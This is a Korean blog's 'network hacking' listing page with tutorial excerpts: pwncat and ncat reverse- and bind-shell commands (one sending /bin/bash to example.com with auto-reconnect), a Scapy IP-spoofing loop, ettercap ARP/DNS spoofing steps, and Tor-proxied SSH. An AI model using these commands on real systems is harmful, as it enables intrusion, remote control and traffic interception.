728x90 네트워크 해킹6 네트워크 해킹 - pwncat 리버스쉘 명령어 pip 설치 명령어 pip install pwncat victim(클라이언트)이 공격자(서버) 접속을 위한 설치 명령어 sudo pip install pwncat-cs 위는 공격자가 python3 -m pwncat 명령어를 쓰기 위한 설치 명령어 TCP Reverse shell(클라이언트) pwncat -e '/bin/bash' example.com 4444 pwncat -e '/bin/bash' example.com 4444 --reconn --reconn-wait 10 10초마다 재연결 시도 공격자 리버스쉘 서버 오픈 python3 -m pwncat -lp 4444 pwncat 프롬프트 명령어 / 단축키 sessions: 연결된 victim들 확인 sessions {ID}: 상호작용 하려는 victi.. 2023. 3. 16. 네트워크 해킹 - 맥(MacOS) 리버스 쉘(Reverse Shell), 바인드 쉘(Bind Shell) 연결 실습 환경 공격자 환경: Ubuntu IP: 192.168.0.5 공격 대상 MacOS(10.13.6) IP: 192.168.0.6 * 맥에서는 nc 명령어가 되지 않는 문제로 대신 ncat 명령어를 사용하였다. 리버스 쉘 공격자가 직접 서버를 여는 방식으로 공격 대상자의 막혀있는 방화벽(아웃바인드)을 우회할 수 있다. 공격자(Ubuntu) nc -lvp 4444 공격 대상(MacOS) ncat 192.168.0.5 4444 -e /bin/zsh 바인드 쉘 공격 대상자가 직접 서버를 여는 형태이다. 공격 대상(MacOS) ncat -lvp 4444 -e /bin/zsh 공격자(Ubuntu) nc 192.168.0.6 4444 출처: https://hobbylists.tistory.com/entry/kal.. 2022. 8. 5. 네트워크 해킹 - tor 작동 원리 다음은 Tor 클라이언트 A (원본)에서 Tor 서버 B, C를 차례로 거쳐 목적지 D (일반 Web 서버 등)에 이르는 경우의 설명이다. 1. A는 미리 얻고 있는 디렉토리 목록에서 임의로 B와 C를 선택한다. 2. A는 B에 대해 가상 회선 연결 요청, AB 사이의 암호화 통신을 위한 세션 키를 교환하기 위한 정보와 함께 전달한다. 3. B는 A에 가상 회선 연결 수락과 함께 세션 키 교환을 위한 정보를 전송한다. 4. AB 사이에 전단까지 얻은 세션 키는 암호화 통신로 얻을 수 있다. 이후 AB 간의 통신이 암호화 통신 경로를 사용하여 행해진다. 5. A는 B에 대해 "B가 C에 대한 가상 회선 연결의 요구를 제출하는 것"을 요구하는 전송한다. 6. B는 C에 대해 가상 회선 연결 요청, BC 사이.. 2022. 8. 1. 리눅스 - ssh 연결시 tor socks5 경유하기 필요 패키지 설치 apt install tor apt install connect # nc(netcat)이 설치되어 있다면 무시 설치 후에는 tor를 실행시켜준다. 사용 명령어 connect ProxyCommand 사용 방법 ssh -o "ProxyCommand connect -5 -S localhost:9050 %h %p" user@123.123.123.123 nc ProxyCommand 사용 방법 ssh -o ProxyCommand="nc -x localhost:9050 %h %p" user@123.123.123.123 프록시 성공 확인 명령어 Windows netstat -n | findstr 22 Linux/macOS who am i 위의 명령어 실행시에 내 접속 아이피가 tor IP 주소로 뜬다.. 2022. 8. 1. Scapy - 파이썬 Scapy로 아이피 스푸핑 from scapy.all import * A = "192.168.1.254" # spoofed source IP address B = "192.168.1.105" # destination IP address C = RandShort() # source port D = 80 # destination port payload = "yada yada yada" # packet payload while True: spoofed_packet = IP(src=A, dst=B) / TCP(sport=C, dport=D) / payload send(spoofed_packet) 출처: https://stackoverflow.com/questions/38956401/ip-spoofing-in-python-3 IP Spoo.. 2022. 7. 27. 네트워크 해킹 - ettercap의 arp 스푸핑을 이용해 dns 스푸핑하기 우선 ettercap 켠다. 그리고 eth0에 접근 인터페이스 상단에 보면 돋보기 모양이 있는데 이를 클릭해 주변에 존재하는 호스트들을 잡는다. 그리고 확인된 아이피 어드레스들 중 라우터(공유기)로 추정되는 것은 Target 1으로 지정하고, 스니핑(도청)을 당하고자하는 타겟은 Target 2로 지정 이제 다시 인터페이스에 상단 맨 오른쪽에 지구본 모양이 있는데 이를 클릭해서 ARP poising...을 누른 다음 이런 체크 박스 창이 뜨게되면 사진과 같이 "Sniff remote connections."를 체크하고 OK를 눌러 ARP 스푸핑을 시작한다. 이제 피해자의 PC를 조작한다. cmd에 들어가서 "arp -a"를 실행시켜주게 되면 (ARP 테이블 확인 명령어) 공유기의 물리적 주소가 아래의 다른.. 2021. 12. 22. 이전 1 다음 728x90